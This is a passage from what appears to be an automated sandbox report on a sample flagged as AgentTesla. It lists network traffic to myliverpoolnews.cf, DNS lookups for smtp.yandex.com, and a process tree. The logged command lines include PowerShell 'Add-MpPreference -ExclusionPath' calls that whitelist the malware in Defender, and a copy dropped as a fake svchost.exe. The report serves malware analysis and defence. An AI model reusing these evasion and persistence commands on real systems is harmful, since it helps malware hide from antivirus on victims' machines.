                                                                                Apr 8, 2021 12:50:23.325455904 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:23.325472116 CEST49683443192.168.2.3104.21.56.119
                                                                                Apr 8, 2021 12:50:23.325517893 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:23.325797081 CEST49683443192.168.2.3104.21.56.119
                                                                                Apr 8, 2021 12:50:23.326551914 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:23.327020884 CEST49683443192.168.2.3104.21.56.119
                                                                                Apr 8, 2021 12:50:23.327354908 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:23.327393055 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:23.327425003 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:23.327452898 CEST49683443192.168.2.3104.21.56.119
                                                                                Apr 8, 2021 12:50:23.327486038 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:23.327514887 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:23.327537060 CEST49683443192.168.2.3104.21.56.119
                                                                                Apr 8, 2021 12:50:23.327558994 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:23.327585936 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:23.327611923 CEST49683443192.168.2.3104.21.56.119
                                                                                Apr 8, 2021 12:50:23.327773094 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:23.327831030 CEST49683443192.168.2.3104.21.56.119
                                                                                Apr 8, 2021 12:50:23.327897072 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:23.327922106 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:23.327949047 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:23.327979088 CEST49683443192.168.2.3104.21.56.119
                                                                                Apr 8, 2021 12:50:23.328756094 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:23.328840017 CEST49683443192.168.2.3104.21.56.119
                                                                                Apr 8, 2021 12:50:23.328915119 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:23.328958035 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:23.329015017 CEST49683443192.168.2.3104.21.56.119
                                                                                Apr 8, 2021 12:50:23.340941906 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:23.341269016 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:23.341288090 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:23.341340065 CEST49683443192.168.2.3104.21.56.119

                                                                                UDP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Apr 8, 2021 12:50:22.570270061 CEST5190453192.168.2.38.8.8.8
                                                                                Apr 8, 2021 12:50:22.623327971 CEST53519048.8.8.8192.168.2.3
                                                                                Apr 8, 2021 12:50:22.735455990 CEST6132853192.168.2.38.8.8.8
                                                                                Apr 8, 2021 12:50:22.748990059 CEST53613288.8.8.8192.168.2.3
                                                                                Apr 8, 2021 12:50:23.790968895 CEST5413053192.168.2.38.8.8.8
                                                                                Apr 8, 2021 12:50:23.803575039 CEST53541308.8.8.8192.168.2.3
                                                                                Apr 8, 2021 12:50:24.936079025 CEST5696153192.168.2.38.8.8.8
                                                                                Apr 8, 2021 12:50:25.957302094 CEST5696153192.168.2.38.8.8.8
                                                                                Apr 8, 2021 12:50:25.970186949 CEST53569618.8.8.8192.168.2.3
                                                                                Apr 8, 2021 12:50:26.992234945 CEST5935353192.168.2.38.8.8.8
                                                                                Apr 8, 2021 12:50:27.005903006 CEST53593538.8.8.8192.168.2.3
                                                                                Apr 8, 2021 12:50:28.583962917 CEST5223853192.168.2.38.8.8.8
                                                                                Apr 8, 2021 12:50:28.595890045 CEST53522388.8.8.8192.168.2.3
                                                                                Apr 8, 2021 12:50:33.884123087 CEST4987353192.168.2.38.8.8.8
                                                                                Apr 8, 2021 12:50:33.897047043 CEST53498738.8.8.8192.168.2.3
                                                                                Apr 8, 2021 12:50:40.156470060 CEST5319653192.168.2.38.8.8.8
                                                                                Apr 8, 2021 12:50:40.170964003 CEST53531968.8.8.8192.168.2.3
                                                                                Apr 8, 2021 12:50:40.963442087 CEST5677753192.168.2.38.8.8.8
                                                                                Apr 8, 2021 12:50:40.976059914 CEST53567778.8.8.8192.168.2.3
                                                                                Apr 8, 2021 12:50:41.808553934 CEST5864353192.168.2.38.8.8.8
                                                                                Apr 8, 2021 12:50:41.821075916 CEST53586438.8.8.8192.168.2.3
                                                                                Apr 8, 2021 12:50:43.196456909 CEST6098553192.168.2.38.8.8.8
                                                                                Apr 8, 2021 12:50:43.209326029 CEST53609858.8.8.8192.168.2.3
                                                                                Apr 8, 2021 12:50:44.631690025 CEST5020053192.168.2.38.8.8.8
                                                                                Apr 8, 2021 12:50:44.644912004 CEST53502008.8.8.8192.168.2.3
                                                                                Apr 8, 2021 12:50:45.426325083 CEST5128153192.168.2.38.8.8.8
                                                                                Apr 8, 2021 12:50:45.439059019 CEST53512818.8.8.8192.168.2.3
                                                                                Apr 8, 2021 12:50:46.998987913 CEST4919953192.168.2.38.8.8.8
                                                                                Apr 8, 2021 12:50:47.014205933 CEST53491998.8.8.8192.168.2.3
                                                                                Apr 8, 2021 12:50:48.121932983 CEST5062053192.168.2.38.8.8.8
                                                                                Apr 8, 2021 12:50:48.134579897 CEST53506208.8.8.8192.168.2.3
                                                                                Apr 8, 2021 12:50:49.089662075 CEST6493853192.168.2.38.8.8.8
                                                                                Apr 8, 2021 12:50:49.138096094 CEST53649388.8.8.8192.168.2.3
                                                                                Apr 8, 2021 12:50:50.010215044 CEST6015253192.168.2.38.8.8.8
                                                                                Apr 8, 2021 12:50:50.023677111 CEST53601528.8.8.8192.168.2.3
                                                                                Apr 8, 2021 12:50:51.302941084 CEST5754453192.168.2.38.8.8.8
                                                                                Apr 8, 2021 12:50:51.315576077 CEST53575448.8.8.8192.168.2.3
                                                                                Apr 8, 2021 12:50:52.159646988 CEST5598453192.168.2.38.8.8.8
                                                                                Apr 8, 2021 12:50:52.172245979 CEST53559848.8.8.8192.168.2.3
                                                                                Apr 8, 2021 12:50:53.199532032 CEST6418553192.168.2.38.8.8.8
                                                                                Apr 8, 2021 12:50:53.212141991 CEST53641858.8.8.8192.168.2.3
                                                                                Apr 8, 2021 12:50:53.282444954 CEST6511053192.168.2.38.8.8.8
                                                                                Apr 8, 2021 12:50:53.296473980 CEST53651108.8.8.8192.168.2.3
                                                                                Apr 8, 2021 12:51:01.054575920 CEST5836153192.168.2.38.8.8.8
                                                                                Apr 8, 2021 12:51:01.067333937 CEST53583618.8.8.8192.168.2.3
                                                                                Apr 8, 2021 12:51:01.974211931 CEST6349253192.168.2.38.8.8.8
                                                                                Apr 8, 2021 12:51:01.987971067 CEST53634928.8.8.8192.168.2.3
                                                                                Apr 8, 2021 12:51:09.723517895 CEST6083153192.168.2.38.8.8.8
                                                                                Apr 8, 2021 12:51:09.744189978 CEST53608318.8.8.8192.168.2.3
                                                                                Apr 8, 2021 12:51:46.747689962 CEST6010053192.168.2.38.8.8.8
                                                                                Apr 8, 2021 12:51:46.760093927 CEST53601008.8.8.8192.168.2.3
                                                                                Apr 8, 2021 12:51:59.866867065 CEST5319553192.168.2.38.8.8.8
                                                                                Apr 8, 2021 12:51:59.879518032 CEST53531958.8.8.8192.168.2.3
                                                                                Apr 8, 2021 12:52:14.396823883 CEST5014153192.168.2.38.8.8.8
                                                                                Apr 8, 2021 12:52:14.397600889 CEST5302353192.168.2.38.8.8.8
                                                                                Apr 8, 2021 12:52:14.415371895 CEST53530238.8.8.8192.168.2.3
                                                                                Apr 8, 2021 12:52:14.415405035 CEST53501418.8.8.8192.168.2.3
                                                                                Apr 8, 2021 12:52:15.489598036 CEST5872253192.168.2.38.8.8.8
                                                                                Apr 8, 2021 12:52:15.490178108 CEST5659653192.168.2.38.8.8.8
                                                                                Apr 8, 2021 12:52:15.492432117 CEST6410153192.168.2.38.8.8.8
                                                                                Apr 8, 2021 12:52:15.501982927 CEST53587228.8.8.8192.168.2.3
                                                                                Apr 8, 2021 12:52:15.503160000 CEST53565968.8.8.8192.168.2.3
                                                                                Apr 8, 2021 12:52:15.505151033 CEST53641018.8.8.8192.168.2.3
                                                                                Apr 8, 2021 12:52:56.284813881 CEST4956353192.168.2.38.8.8.8
                                                                                Apr 8, 2021 12:52:56.298275948 CEST53495638.8.8.8192.168.2.3
                                                                                Apr 8, 2021 12:52:56.386115074 CEST5135253192.168.2.38.8.8.8
                                                                                Apr 8, 2021 12:52:56.399106979 CEST53513528.8.8.8192.168.2.3

                                                                                DNS Queries

                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                Apr 8, 2021 12:50:22.570270061 CEST192.168.2.38.8.8.80x271cStandard query (0)myliverpoolnews.cfA (IP address)IN (0x0001)
                                                                                Apr 8, 2021 12:50:22.735455990 CEST192.168.2.38.8.8.80x4193Standard query (0)myliverpoolnews.cfA (IP address)IN (0x0001)
                                                                                Apr 8, 2021 12:52:56.284813881 CEST192.168.2.38.8.8.80x1509Standard query (0)smtp.yandex.comA (IP address)IN (0x0001)
                                                                                Apr 8, 2021 12:52:56.386115074 CEST192.168.2.38.8.8.80x6880Standard query (0)smtp.yandex.comA (IP address)IN (0x0001)

                                                                                DNS Answers

                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                Apr 8, 2021 12:50:22.623327971 CEST8.8.8.8192.168.2.30x271cNo error (0)myliverpoolnews.cf104.21.56.119A (IP address)IN (0x0001)
                                                                                Apr 8, 2021 12:50:22.623327971 CEST8.8.8.8192.168.2.30x271cNo error (0)myliverpoolnews.cf172.67.150.212A (IP address)IN (0x0001)
                                                                                Apr 8, 2021 12:50:22.748990059 CEST8.8.8.8192.168.2.30x4193No error (0)myliverpoolnews.cf104.21.56.119A (IP address)IN (0x0001)
                                                                                Apr 8, 2021 12:50:22.748990059 CEST8.8.8.8192.168.2.30x4193No error (0)myliverpoolnews.cf172.67.150.212A (IP address)IN (0x0001)
                                                                                Apr 8, 2021 12:52:56.298275948 CEST8.8.8.8192.168.2.30x1509No error (0)smtp.yandex.comsmtp.yandex.ruCNAME (Canonical name)IN (0x0001)
                                                                                Apr 8, 2021 12:52:56.298275948 CEST8.8.8.8192.168.2.30x1509No error (0)smtp.yandex.ru77.88.21.158A (IP address)IN (0x0001)
                                                                                Apr 8, 2021 12:52:56.399106979 CEST8.8.8.8192.168.2.30x6880No error (0)smtp.yandex.comsmtp.yandex.ruCNAME (Canonical name)IN (0x0001)
                                                                                Apr 8, 2021 12:52:56.399106979 CEST8.8.8.8192.168.2.30x6880No error (0)smtp.yandex.ru77.88.21.158A (IP address)IN (0x0001)

                                                                                HTTP Request Dependency Graph

                                                                                • myliverpoolnews.cf

                                                                                HTTP Packets

                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                0192.168.2.349682104.21.56.11980C:\Users\user\Desktop\qINcOlwRud.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Apr 8, 2021 12:50:22.679862022 CEST91OUTGET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-A8BB9FBC655E731A0C6CD58E2C4B52B7.html HTTP/1.1
                                                                                UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41
                                                                                Host: myliverpoolnews.cf
                                                                                Connection: Keep-Alive
                                                                                Apr 8, 2021 12:50:22.716279984 CEST92INHTTP/1.1 301 Moved Permanently
                                                                                Date: Thu, 08 Apr 2021 10:50:22 GMT
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                Cache-Control: max-age=3600
                                                                                Expires: Thu, 08 Apr 2021 11:50:22 GMT
                                                                                Location: https://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-A8BB9FBC655E731A0C6CD58E2C4B52B7.html
                                                                                cf-request-id: 0952b3d4600000177e56ad2000000001
                                                                                Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=YXBfuqv1DKsr3kYv9lDZknqZTQudOELsBXUbs%2BSSZ8Bsuq00QBPcgZC4CQk52NwhIRljIVGOCdJQ6pIoGWQM4X8gtYq17%2FmaGN%2BbruVScxTtW7s%3D"}],"max_age":604800}
                                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 63caef33ce07177e-FRA
                                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0
                                                                                Apr 8, 2021 12:50:23.799249887 CEST1394OUTGET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-6C1A7BF393BEFEDE5EF77372F8A536BC.html HTTP/1.1
                                                                                UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41
                                                                                Host: myliverpoolnews.cf
                                                                                Apr 8, 2021 12:50:23.824533939 CEST1396INHTTP/1.1 301 Moved Permanently
                                                                                Date: Thu, 08 Apr 2021 10:50:23 GMT
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                Cache-Control: max-age=3600
                                                                                Expires: Thu, 08 Apr 2021 11:50:23 GMT
                                                                                Location: https://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-6C1A7BF393BEFEDE5EF77372F8A536BC.html
                                                                                cf-request-id: 0952b3d8c10000177e2fa4d000000001
                                                                                Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=4fGAoHxW8%2BxaGArqNeg5sPQGlUehvpIKet4Wb%2B6KB0p0FoLjSMgEX5YgXLYOjOcQ1dFo1Xr7tL6vahM%2FwxL5SRLexqct11fmNS5ykPfpS0X%2Bvis%3D"}],"max_age":604800}
                                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 63caef3ac82e177e-FRA
                                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0
                                                                                Apr 8, 2021 12:50:26.081063986 CEST2703OUTGET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-A1DD2EDE961D10CC641FCFA5CF4FBAFC.html HTTP/1.1
                                                                                UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41
                                                                                Host: myliverpoolnews.cf
                                                                                Apr 8, 2021 12:50:26.103168964 CEST2704INHTTP/1.1 301 Moved Permanently
                                                                                Date: Thu, 08 Apr 2021 10:50:26 GMT
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                Cache-Control: max-age=3600
                                                                                Expires: Thu, 08 Apr 2021 11:50:26 GMT
                                                                                Location: https://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-A1DD2EDE961D10CC641FCFA5CF4FBAFC.html
                                                                                cf-request-id: 0952b3e1a90000177e14a04000000001
                                                                                Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=YwgF2iZHx%2BhZCOKIwBE5dKVJBaKnU4FIqGT32q%2FE5R%2FgtJzj7GYaYwsoc6SSFx6qyQFN8OGjqylSeAdUQ8GZMQzGjWNDuQAAgTpgw1sad3GmMjs%3D"}],"max_age":604800}
                                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 63caef490e3e177e-FRA
                                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                HTTPS Packets

                                                                                TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                Apr 8, 2021 12:50:22.814704895 CEST104.21.56.119443192.168.2.349683CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEWed Mar 31 02:00:00 CEST 2021 Mon Jan 27 13:48:08 CET 2020Thu Mar 31 01:59:59 CEST 2022 Wed Jan 01 00:59:59 CET 2025769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,054328bd36c14bd82ddaa0c04b25ed9ad
                                                                                CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025

                                                                                Code Manipulations

                                                                                Statistics

                                                                                Behavior

                                                                                Click to jump to process

                                                                                System Behavior

                                                                                Analysis Process: qINcOlwRud.exe PID: 5476 Parent PID: 5496

                                                                                General

                                                                                Start time:12:50:20
                                                                                Start date:08/04/2021
                                                                                Path:C:\Users\user\Desktop\qINcOlwRud.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:'C:\Users\user\Desktop\qINcOlwRud.exe'
                                                                                Imagebase:0xab0000
                                                                                File size:46592 bytes
                                                                                MD5 hash:D6B29ADD344D2284845F133B8505126E
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.304230234.000000000434C000.00000004.00000001.sdmp, Author: Joe Security
                                                                                Reputation:low

                                                                                Analysis Process: powershell.exe PID: 908 Parent PID: 5476

                                                                                General

                                                                                Start time:12:50:29
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force
                                                                                Imagebase:0x1180000
                                                                                File size:430592 bytes
                                                                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET
                                                                                Reputation:high

                                                                                Analysis Process: conhost.exe PID: 160 Parent PID: 908

                                                                                General

                                                                                Start time:12:50:29
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6b2800000
                                                                                File size:625664 bytes
                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                Analysis Process: powershell.exe PID: 1364 Parent PID: 5476

                                                                                General

                                                                                Start time:12:50:29
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\qINcOlwRud.exe' -Force
                                                                                Imagebase:0x1180000
                                                                                File size:430592 bytes
                                                                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET
                                                                                Reputation:high

                                                                                Analysis Process: conhost.exe PID: 3288 Parent PID: 1364

                                                                                General

                                                                                Start time:12:50:30
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6b2800000
                                                                                File size:625664 bytes
                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                Analysis Process: powershell.exe PID: 3880 Parent PID: 5476

                                                                                General

                                                                                Start time:12:50:30
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force
                                                                                Imagebase:0x1180000
                                                                                File size:430592 bytes
                                                                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET
                                                                                Reputation:high

                                                                                Analysis Process: conhost.exe PID: 5772 Parent PID: 3880

                                                                                General

                                                                                Start time:12:50:31
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6b2800000
                                                                                File size:625664 bytes
                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                Analysis Process: cmd.exe PID: 5972 Parent PID: 5476

                                                                                General

                                                                                Start time:12:50:33
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
                                                                                Imagebase:0xbd0000
                                                                                File size:232960 bytes
                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                Analysis Process: conhost.exe PID: 5932 Parent PID: 5972

                                                                                General

                                                                                Start time:12:50:34
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6b2800000
                                                                                File size:625664 bytes
                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                Analysis Process: timeout.exe PID: 5756 Parent PID: 5972

                                                                                General

                                                                                Start time:12:50:34
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\SysWOW64\timeout.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:timeout 1
                                                                                Imagebase:0x13b0000
                                                                                File size:26112 bytes
                                                                                MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                Analysis Process: qINcOlwRud.exe PID: 4456 Parent PID: 5476

                                                                                General

                                                                                Start time:12:50:42
                                                                                Start date:08/04/2021
                                                                                Path:C:\Users\user\Desktop\qINcOlwRud.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Users\user\Desktop\qINcOlwRud.exe
                                                                                Imagebase:0x750000
                                                                                File size:46592 bytes
                                                                                MD5 hash:D6B29ADD344D2284845F133B8505126E
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET
                                                                                Reputation:low

                                                                                Analysis Process: svchost.exe PID: 5512 Parent PID: 568

                                                                                General

                                                                                Start time:12:50:44
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                Imagebase:0x7ff7488e0000
                                                                                File size:51288 bytes
                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language

                                                                                Analysis Process: svchost.exe PID: 5820 Parent PID: 3388

                                                                                General

                                                                                Start time:12:50:45
                                                                                Start date:08/04/2021
                                                                                Path:C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe'
                                                                                Imagebase:0x910000
                                                                                File size:46592 bytes
                                                                                MD5 hash:D6B29ADD344D2284845F133B8505126E
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET
                                                                                Antivirus matches:
                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                • Detection: 27%, ReversingLabs

                                                                                Analysis Process: WerFault.exe PID: 6000 Parent PID: 5476

                                                                                General

                                                                                Start time:12:50:45
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5476 -s 1936
                                                                                Imagebase:0xd80000
                                                                                File size:434592 bytes
                                                                                MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET

                                                                                Analysis Process: svchost.exe PID: 3776 Parent PID: 3388

                                                                                General

                                                                                Start time:12:50:53
                                                                                Start date:08/04/2021
                                                                                Path:C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe'
                                                                                Imagebase:0x3b0000
                                                                                File size:46592 bytes
                                                                                MD5 hash:D6B29ADD344D2284845F133B8505126E
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET

                                                                                Analysis Process: svchost.exe PID: 4664 Parent PID: 568

                                                                                General

                                                                                Start time:12:50:56
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                Imagebase:0x7ff7488e0000
                                                                                File size:51288 bytes
                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language

                                                                                Analysis Process: svchost.exe PID: 5328 Parent PID: 568

                                                                                General

                                                                                Start time:12:50:56
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:c:\windows\system32\svchost.exe -k unistacksvcgroup
                                                                                Imagebase:0x7ff7488e0000
                                                                                File size:51288 bytes
                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language

                                                                                Analysis Process: svchost.exe PID: 5868 Parent PID: 568

                                                                                General

                                                                                Start time:12:50:57
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                Imagebase:0x7ff7488e0000
                                                                                File size:51288 bytes
                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language

                                                                                Analysis Process: svchost.exe PID: 5412 Parent PID: 568

                                                                                General

                                                                                Start time:12:50:58
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                Imagebase:0x7ff7488e0000
                                                                                File size:51288 bytes
                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language

                                                                                Analysis Process: svchost.exe PID: 1320 Parent PID: 568

                                                                                General

                                                                                Start time:12:50:59
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                Wow64 process (32bit):false
